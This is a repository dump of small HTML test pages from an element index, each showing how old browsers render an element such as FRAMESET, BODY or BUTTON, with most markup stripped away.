H3 element H3 element

45 | basefont face=verdana 46 | 47 | filler text 48 |
49 |
50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/big-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: BIG element 6 | 7 | 8 | 9 | 10 |

Code example: BIG element

11 | 12 |
13 | filler text big text filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/blink-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: BLINK element 6 | 7 | 8 | 9 | 10 |

Code example: BLINK element

11 | 12 |
13 | filler text blinking text filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/blockquote-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BLOCKQUOTE: Browser peculiarity - rendering effects in Mozilla 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
The CITE attribute is exposed in Netscape 6.1+ by invoking a 15 | context menu on the element (PC: right clicking) and choosing "properties."
16 | The value of CITE for the test element below is: "http://www.example.com/bqcitation.htm"
17 | 18 |
19 | filler text
blockquote text
filler text 20 |
21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/blockquote-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: BLOCKQUOTE element 6 | 7 | 8 | 9 | 10 |

Code example: BLOCKQUOTE element

11 | 12 |
13 | filler text
blockquote text
filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/body-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BODY: Browser peculiarity/tip - BODY attributes with invalid BACKGROUND and 6 | no BGCOLOR 7 | 10 | 11 | 12 | 14 | 15 | Assertion: 16 |
If the background image fails to download for any reason and 17 | no BGColor is specified it is common practice for browsers not to apply the other 18 | coloring attributes (this ensures readability with the default browser color schemes.)
19 |
20 | 21 | This document contains a valid background URL reference, text=#0000cc (blue), 22 | link=yellow, vlink=#ff0000. BGColor is specified: #808080. 23 |
24 | filler text 25 | Link text 26 | VLink text 27 | filler text 28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/body-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BODY: Browser peculiarity/tip - BODY attributes with invalid BACKGROUND and 6 | no BGCOLOR 7 | 10 | 11 | 12 | 14 | 15 | Assertion: 16 |
If the background image fails to download for any reason and 17 | no BGColor is specified it is common practice for browsers not to apply the other 18 | coloring attributes (this ensures readability with the default browser color schemes.)
19 |
20 | 21 | This document contains a valid background URL reference, text=#0000cc (blue), 22 | link=yellow, vlink=#ff0000. No BGColor is specified. 23 |
24 | filler text 25 | Link text 26 | VLink text 27 | filler text 28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/body-bp4.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BODY: Browser peculiarity/tip - BODY attributes with invalid BACKGROUND and 6 | no BGCOLOR 7 | 10 | 11 | 12 | 14 | 15 | Assertion: 16 |
If the background image fails to download for any reason and 17 | no BGColor is specified it is common practice for browsers not to apply the other 18 | coloring attributes (this ensures readability with the default browser color schemes.)
19 |
20 | 21 | This document contains an invalid background URL reference, text=#0000cc (blue), 22 | link=yellow, vlink=#ff0000. BGColor is specified: #808080. 23 |
24 | filler text 25 | Link text 26 | VLink text 27 | filler text 28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/body-bp5.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BODY: Browser peculiarity/tip - BODY attributes with invalid BACKGROUND and 6 | no BGCOLOR 7 | 10 | 11 | 12 | 14 | 15 | Assertion: 16 |
If the background image fails to download for any reason and 17 | no BGColor is specified it is common practice for browsers not to apply the other 18 | coloring attributes (this ensures readability with the default browser color schemes.)
19 |
20 | 21 | This document contains an invalid background URL reference, text=#0000cc (blue), 22 | link=yellow, vlink=#ff0000. No BGColor is specified. 23 |
24 | filler text 25 | Link text 26 | VLink text 27 | filler text 28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/br-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BR: Browser Peculiarities: absorbed linefeeds 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
If you use a BR at the end of a block structuring element (ex: BLOCKQUOTE) 15 | or block structuring sub element (ex: LI), you may need to use two consecutive line 16 | breaks to produce a visual space in a document. This is because there is already 17 | an implied line break at the end of block structures.
18 |
19 | 20 | Simple table: 21 |
22 | filler text 23 |
TD Cell 1TH Cell 2
24 | filler text 25 |
26 | 27 | Simple table with one BR after: 28 |
29 | filler text 30 |
TD Cell 1TH Cell 2
31 |
32 | filler text 33 |
34 | 35 | Simple table with two BRs after: 36 |
37 | filler text 38 |
TD Cell 1TH Cell 2
39 |

40 | filler text 41 |
42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/b/button-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | BUTTON: Browser peculiarity - DISABLED attribute and nested tables 6 | 11 | 12 | 13 | 14 | 15 | Assertions: 16 |
Netscape 6: If the DISABLED attribute is used, it grays out the 17 | content, but I noticed that it did not gray out content inside tables that are used 18 | in the BUTTON.
19 |
20 | 21 |
22 | Button element with embedded table, no DISABLED attribute: 23 |
24 | filler text 25 | 28 | filler text 29 |
30 |
31 |
32 | 33 |
34 | Button element with embedded table, DISABLED attribute present: 35 |
36 | filler text 37 | 40 | filler text 41 |
42 |
43 |
44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/c/center-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: CENTER element 6 | 7 | 8 | 9 | 10 |

Code example: CENTER element

11 | 12 |
13 | filler text
Centered text
filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/c/cite-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: CITE element 6 | 7 | 8 | 9 | 10 |

Code example: CITE element

11 | 12 |
13 | filler text citation text filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/c/code-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: CODE element 6 | 7 | 8 | 9 | 10 |

Code example: CODE element

11 | 12 |
13 | filler text code segment filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/del-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | DEL: Browser peculiarity - rendering effects in Mozilla 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
The CITE/DATETIME attributes are exposed in Netscape 6.1+ by 15 | invoking a context menu on the element (PC: right clicking) and choosing "properties."
16 | The value of CITE for the test element below is: "#jan25-2001" and DATETIME is 17 | "2001-01-25T18:00:00PST"
18 |
19 | 20 |
21 | filler text del text filler text 22 |
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/del-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: DEL element 6 | 7 | 8 | 9 | 10 |

Code example: DEL element

11 | 12 |
13 | filler text Deleted text filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/dfn-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: DFN element 6 | 7 | 8 | 9 | 10 |

Code example: DFN element

11 | 12 |
13 | filler text defining text filler text 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/dir-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | DIR: Browser Peculiarities: Basic rendering compared to a UL list 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
The reviewed browsers make no distinction in display between a UL and a DIR list.
15 |
16 | 17 | Basic DIR list: 18 |
19 | filler text 20 | 21 |
  • LI item 1 22 |
  • LI item 2 23 |
  • LI item 3 24 |
  • 25 | filler text 26 |
    27 |
    28 | 29 | Basic UL list: 30 |
    31 | filler text 32 |
      33 |
    • LI item 1 34 |
    • LI item 2 35 |
    • LI item 3 36 |
    37 | filler text 38 |
    39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/dir-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: DIR element 6 | 7 | 8 | 9 | 10 |

    Code example: DIR element

    11 | 12 |
    13 | filler text 14 | 15 |
  • A - H
  • 16 |
  • I - M
  • 17 |
  • N - R
  • 18 |
  • S - Z
  • 19 |
    20 | filler text 21 |
    22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/div-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: DIV element 6 | 7 | 8 | 9 | 10 |

    Code example: DIV element

    11 | 12 |
    13 | filler text
    div text
    filler text 14 |
    15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/dl-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: DL element 6 | 7 | 8 | 9 | 10 |

    Code example: DL element

    11 | 12 |
    13 | filler text 14 |
    15 |
    Term 1
    16 |
    Term 1 definition
    17 |
    Term 2
    18 |
    Term 2 definition
    19 |
    20 | filler text 21 |
    22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/dtdd-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | DT/DD: Browser tip - Multiple consecutive DD elements 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    Despite the caveat to not have multiple consecutive DD 15 | elements, most browsers have no problem with it.
    16 |
    17 | 18 | Test with first DT having 4 consecutive DD elements following, followed by a DT 19 | element with no DD elements following: 20 |
    21 | filler text 22 |
    23 |
    DT item 1 24 |
    DD item 1 25 |
    DD item 2 26 |
    DD item 3 27 |
    DD item 4 28 |
    DT item 2 29 |
    30 | filler text 31 |
    32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/d/dtdd-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: DT and DD elements 6 | 7 | 8 | 9 | 10 |

    Code example: DT and DD elements

    11 | 12 |
    13 | filler text 14 |
    15 |
    Term 1
    16 |
    Term 1 definition
    17 |
    Term 2
    18 |
    Term 2 definition
    19 |
    20 | filler text 21 |
    22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/e/em-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: EM element 6 | 7 | 8 | 9 | 10 |

    Code example: EM element

    11 | 12 |
    13 | filler text emphasized text filler text 14 |
    15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/e/embedtest.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Embedded document test 6 | 7 | 8 | 9 | 10 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 11 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 12 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 13 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 14 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 15 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 16 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 17 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 18 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 19 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/e/embedtest.txt: -------------------------------------------------------------------------------- 1 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 2 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 3 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 4 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 5 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 6 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 7 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/fieldset-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FIELDSET: Browser Peculiarities: DIR=rtl rendering 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Netscape 6 Beta 1 interprets the DIR=RTL attribute slightly 15 | different than later Netscape betas and Internet Explorer.
    16 |
    17 | 18 |
    19 | Simple FIELDSET element, no DIR attribute: 20 |
    21 | filler text 22 |
    23 | Legend Legend 24 | 25 | Filler Text 26 | 27 |
    28 | filler text 29 |
    30 |
    31 |
    32 | 33 |
    34 | Simple FIELDSET element, DIR=rtl: 35 |
    36 | filler text 37 |
    38 | Legend Legend 39 | 40 | Filler Text 41 | 42 |
    43 | filler text 44 |
    45 |
    46 |
    47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/font-example.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Code example: FONT element 6 | 7 | 8 | 9 | 10 |

    Code example: FONT element

    11 | 12 | Font SIZE relative (+2): 13 |
    filler text font text filler text
    14 |
    15 | 16 | Font SIZE absolute (6): 17 |
    filler text font text filler text
    18 |
    19 | 20 | Font POINT-SIZE (20): 21 |
    filler text font text filler text
    22 |
    23 | 24 | Font COLOR (#00ff00): 25 |
    filler text font text filler text
    26 |
    27 | 28 | Font FACE (Arial,'Times New Roman',System): 29 |
    filler text font text filler text
    30 |
    31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frame-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: Browser Peculiarities: "some Internet Explorer versions where the 6 | BODY BACKGROUND attribute in the NOFRAMES section is applied to the frame borders. 7 | This behavior is an odd artifact and probably a bug." 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | <body background="../../../objects/crosshair.gif"> 17 | 18 | whatever 19 | 20 | </body> 21 | 22 | 23 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frame-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: In all versions of Netscape, if no SRC attribute is initially specified, 6 | the frame area is no longer addressable as a target (even if a NAME is specified) 7 | for document links, etc. Internet Explorer and Opera handle the case of an 8 | initial blank SRC just fine. 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frame-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: Browser peculiarity - ROWS and COLS in same FRAMESET definition 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    Authors can also choose to specify ROWS and COLS in the same 15 | FRAMESET element. If this is done, the nested FRAME references will be assigned 16 | sequentially to the ROWS and COLS layout specifications as follows: left to right, 17 | top to bottom (eg: COLS, then ROWS.)
    18 |
    19 | 20 | 21 |
    22 | Frameset definition: rows="*,*,*" cols="*,*", Frames in order: A, B, C, D, E, F 23 |
    24 |
    25 | 26 |
    27 | Frameset definition: cols="*,*" rows="*,*,*", Frames in order: A, B, C, D, E, F 28 |
    29 |
    30 | 31 |
    32 | Frameset definition: cols="*,*,*" rows="*,*", Frames in order: A, B, C, D, E, F 33 |
    34 |
    35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frame-bp4.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | A frameset consists of two identical rows, referencing the same document, 6 | that contains only a single image horizontally centered on the page. 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/framea.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME A 6 | 7 | 8 | 9 |

    Frame A

    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frameb.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME B 6 | 7 | 8 | 9 |

    Frame B

    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/framec.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME C 6 | 7 | 8 | 9 |

    Frame C

    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/framed.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME D 6 | 7 | 8 | 9 |

    Frame D

    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/framee.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME E 6 | 7 | 8 | 9 |

    Frame E

    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/framef.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME F 6 | 7 | 8 | 9 |

    Frame F

    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frameset-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAMESET: Browser peculiarity - Abusing ROWS and COLS definitions to non-window sizes 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    It is easy to abuse any of the methods of specifying frame sizes 15 | to allow dimensions that are not equal to the parent frame size (while this can be 16 | harmless, it could cause display problems.)
    17 |
    18 | 19 | 20 |
    21 | Frameset definition: rows="150,100" 22 |
    23 |
    24 | 25 |
    26 | Frameset definition: rows="800,1200" 27 |
    28 |
    29 | 30 |
    31 | Frameset definition: rows="150,*,100" 32 |
    33 |
    34 | 35 |
    36 | Frameset definition: rows="800,*,1200" 37 |
    38 |
    39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frameset-bp3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAMESET: Browser peculiarity - FRAMESPACING and NORESIZE in child frames 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    Internet Explorer: If the FRAMESPACING attribute is given a 15 | value of zero, it effectively sets the NORESIZE attribute of the sub-frames as well. 16 | It almost seems as if IE frames need a positive FRAMESPACING value for the user 17 | to "grab on to" or move.
    18 |
    19 | 20 |
    21 | Frameset definition: 2 columns, frameset has no FRAMESPACING attribute 22 |
    23 |
    24 | 25 |
    26 | Frameset definition: 2 columns, frameset has FRAMESPACING=0 27 |
    28 |
    29 | 30 |
    31 | Frameset definition: 2 columns, frameset has FRAMESPACING=5 32 |
    33 |
    34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest-recursivecols.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | Frameset Page 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest-recursivecombo1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | Frameset Page 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest-recursivecombo2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | Frameset Page 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest-recursiverows.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | Frameset Page 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Frameset document 6 | 7 | 8 | 9 | 10 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 11 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 12 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 13 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 14 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 15 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 16 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 17 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 18 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 19 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest10.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: rows="800,1200" 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest11.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: rows="150,*,100" 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest12.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: rows="800,*,1200" 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest13.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Basic 2 column frameset 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest14.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Frameset with no FRAMESPACING attribute 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest15.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Frameset with FRAMESPACING=0 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest16.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Frameset with FRAMESPACING=5 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: Browser peculiarity - Empty SRC and frame targeting 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    In all versions of Netscape, if no SRC attribute is initially 15 | specified, the frame area is no longer addressable as a target (even if a NAME is specified) 16 | for document links, etc. Internet Explorer and Opera handle the case of an initial 17 | blank SRC just fine.
    18 |
    19 | 20 | Hyperlink to top/right frame (frame initially contains a document) 21 |
    22 | Hyperlink 23 |
    24 |
    25 | 26 | Hyperlink to bottom/right frame (frame initially contains no document) 27 |
    28 | Hyperlink 29 |
    30 |
    31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest3.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: basic document 6 | 7 | 8 | 9 | 10 | Basic framed document

    11 | 12 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 13 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 14 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 15 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 16 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 17 | Filler text Filler text Filler text Filler text Filler text Filler text Filler text 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest4.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: basic document 6 | 9 | 10 | 11 | 12 | 13 | New framed document 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest5.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: rows="*,*,*" cols="*,*" 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest6.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: cols="*,*" rows="*,*,*" 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest8.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: two rows, with document containing only a horizontally centered image 6 | 7 | 8 | 9 |
    10 | 11 | 12 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/f/frametest9.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | FRAME: rows="150,100" 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/h/head-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Assertion:
    7 | Although it is not required to have this element in HTML documents 8 | (XHTML DOES require it), it is still a basic top level element in the HTML document 9 | structure and it is considered bad style to omit it. Having it present more clearly 10 | defines the boundaries between HEAD and BODY elements for a parser or person reading the HTML code. 11 | 12 |

    13 | This document has no HEAD element 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/h/heading-bp1.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Hx: Browser Peculiarities: H7 support in Mosaic 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    Mosaic has always supported another heading size, H7, which 15 | has a lower importance than H6 and is rendered smaller.
    16 | 17 |
    18 | Normal Heading levels 1-6, with the final being the proprietary H7 19 |
    20 | filler text 21 |

    Heading level 1

    22 |

    Heading level 2

    23 |

    Heading level 3

    24 |

    Heading level 4

    25 |
    Heading level 5
    26 |
    Heading level 6
    27 | Heading level 7 28 | filler text 29 |
    30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/h/heading-bp2.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Hx: Browser Peculiarities: Nesting Heading levels 6 | 9 | 10 | 11 | 12 | 13 | Assertion: 14 |
    The DTD for HTML 4 says that heading elements are not nestable. 15 | In practice though, you'll find that authors have often historically done this, 16 | and browsers have no problems rendering this sort of thing either.
    17 | 18 |
    19 | Nesting all Heading levels H1 (outside) - H6 (inside) 20 |
    21 | filler text 22 |

    Heading level 1 23 |

    Heading level 2 24 |

    Heading level 3 25 |

    Heading level 4 26 |

    Heading level 5 27 |
    Heading level 6
    28 | Heading level 5 29 | Heading level 4 30 | Heading level 3 31 | Heading level 2 32 | Heading level 1 33 | filler text 34 |
    35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/h/hr-bp4.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | HR: Browser peculiarity - Affect of the ALIGN attribute without width attribute 6 | 9 | 10 | 11 | 12 | 13 | Assertions: 14 |
    The ALIGN attribute is meaningless unless the WIDTH attribute is also specified.
    15 |
    16 | 17 | Successive HR elements with no WIDTH attribute. First with no align, second with align=left, third with align=center 18 | and fourth with align=right 19 |
    20 |
    21 |
    22 |
    23 |
    24 |
    25 |
    26 |
    27 |
    28 | 29 | Successive HR elements with WIDTH=100 attribute. First with no align, second with align=left, third with align=center 30 | and fourth with align=right 31 |
    32 |
    33 |
    34 |
    35 |
    36 |
    37 |
    38 |
    39 |
    40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /docs/misc/html-element-index/testing/html/tags/h/html-bp1.htm: -------------------------------------------------------------------------------- 1 | Assertion:
    2 | The HTML element was not a required element in the HTML specifications 3 | (but it is required under XHTML), and most popular browsers will not react oddly 4 | to its absence. Still, this is a basic top level element in the HTML/XHTML 5 | document structure and it is recommended to use it. 6 | 7 |

